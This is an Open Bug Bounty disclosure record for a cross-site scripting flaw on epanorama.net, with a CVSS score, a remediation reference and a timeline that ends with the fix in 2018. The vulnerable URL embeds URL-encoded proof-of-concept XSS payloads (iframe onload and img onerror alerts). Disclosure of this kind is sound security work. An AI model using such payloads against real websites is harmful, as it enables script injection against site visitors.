epanorama.net XSS vulnerability

2015-03-16T13:32:00
ID OBB:55801
Type openbugbounty
Reporter guest
Modified 2018-03-14T23:11:00

Description

Open Bug Bounty ID: OBB-55801

Description| Value
---|---
Affected Website:| epanorama.net
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.epanorama.net/results.html?cx=partner-pub-3257650267345122%3Am8l15-vldxh&cof;=FORID%3A10&ie;=ISO-8859-1&q;=%3Ciframe%2F+%2Fonload%3Dalert%28%2FXSSPOSED%2F%29%3E%3C%2Fiframe%3E+&sa;=Search&siteurl;=www.epanorama.net%2Fmulti.php%3Fsearch%3D%26keyword%3D%2522%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253Dalert%2528%2527XSSPOSED%2527%2529%253B%253E&ref;=www.epanorama.net%2Fcircuits%2Fvga2tv%2F&ss;=59j3481j2
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 16 March, 2015 13:32 GMT
Vulnerability Verified:| 16 March, 2015 13:34 GMT
Website Operator Notified:| 16 March, 2015 13:34 GMT
Vulnerability Published:| 16 March, 2015 13:34 GMT[without any technical details]
Vulnerability Fixed:| 14 March, 2018 23:11 GMT
Public Disclosure:| 14 March, 2018 23:11 GMT